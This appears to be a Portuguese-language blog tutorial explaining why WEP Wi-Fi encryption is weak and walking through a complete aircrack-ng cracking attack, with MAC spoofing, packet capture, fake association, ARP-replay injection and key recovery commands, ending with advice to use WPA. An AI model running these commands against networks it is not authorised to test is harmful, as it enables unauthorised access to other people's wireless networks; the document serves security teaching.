Wired Equivalent Privacy (WEP) é parte do padrão IEEE 802.11 (ratificado em Setembro de 1999), e é um protocolo que se utilizava para proteger redes sem fios do tipo Wi-Fi.
WEP 64-bit (40 bits reais) chave secreta 5 caracteres ASCII e 10 caracteres hexadecimais.
WEP 128-bit (104 bits reais) chave secreta 13 caracteres ASCII e 26 caracteres hexadecimais
WEP 256-bit chave secreta 29 caracteres ASCII e 58 caracteres hexadecimais
Usa o RC4 como protocolo de criptografia que é uma cifra de fluxo e o CRC32 para integridade.
Um vetor de inicialização (Leia IV – Initialization Vector) de 24 bits é usado para formar a cifra de fluxo do RC4, o IV é muito pequeno e é enviado em texto puro e segundo o Wikipédia “há uma probabilidade de 50% de que o mesmo VI irá repetir se após 5000 pacotes”.
Então tudo o que a atacante precisa é capturar os pacotes da rede e por analise descobrir a chave WEP.
Se a rede não oferecer a quantidade de IVs necessário é bem certo que o atacante irá injetar dados a fim de ter mais pacotes para ser analisados e quebrados.
Vejas os passos de como ocorre esse tipo de ataque.
Neste exemplo estou usando o BackTrack 5R2 (www.backtrack.org) que já vem com o AirCrack-ng (www.aircrack-ng.org) instalado.
O Aircrack-ng é um conjunto de ferramentas de linha de comando criadas especificamente para capturar e quebrar senhas WEP e WPA-PSK.
De todo o conjunto será usado as seguintes ferramentas:
- airmon-ng – Usado para colocar sua placa de rede no modo monitor.
- airodump-ng – Usado para monitorar e capturar os pacotes.
- aireplay-ng – Usado para gerar trafego adicional na rede wifi.
- aircrack-ng – O Crack que será usado para encontrar a chave WEP.
O comando aireplay-ng faz injeção de pacotes na rede. Você pode testar se sua placa de rede consegue injetar pacotes com o comando:
aireplay-ng -9 wlan0 (veja qual a sua placa e substitua o X)
Parar o modo monitoramento da placa
airmon-ng stop wlan0
Desabilitar a placa
ifconfig wlan0 down
Alterar o MAC da placa de rede
macchanger –mac 00:11:22:33:44:55 wlan0
Iniciar a placa no modo de monitoramento
airmon-ng start wlan0
Note que foi gerada uma placa virtual de captura chamada “mon0”.
Uma vez preparado o ambiente inicie a busca por redes:
airodump-ng mon0
Você pode fazer um filtro usando o parametro –encrypt wep
airodump-ng mon0 –encrypt wep
Anote o BSSID, o Canal (CH) e o ESSID do rede WEP.
Inicie a captura dos pacotes da rede.
airodump-ng -c 6 -w captura –bssid 00:13:10:F2:A5:F5 mon0
–c é o canal
-w nomedoarquivo de captura
–bssid é o id da rede que vamos capturar
mon0 nossa placa de captura.
Deve ser criada uma associação fake com o AP (opção –1 do aireplay-ng 0 é o delay)
Em uma nova janela do terminal execute o comando:
aireplay-ng -1 0 -a 00:13:10:F2:A5:F5 -h 00:11:22:33:44:55 mon0 -e HackMe
Uma vez associado pode ser necessário aumentar o trafego na rede pois como foi explicado no artigo é necessário acima de 5000 pacotes para aumentar a chance de descoberta.
Para isso use o comando aireplay-ng em um novo terminal com o “ataque” –3 que é o envio de ARP-request na rede.
aireplay-ng -3 -b 00:13:10:F2:A5:F5 -h 00:11:22:33:44:55 mon0
Aguarde o aumento do valor #DATA ou mais…. e por fim use o comando
aircrack-ng -b 00:13:10:F2:A5:F5 captura-01.cap
Nesse caso eu coloquei uma chave pequena de 5 caracteres somente para fins educativos.
Contramedida – Não use WEP use WPA !!
Seja o primeiro a comentar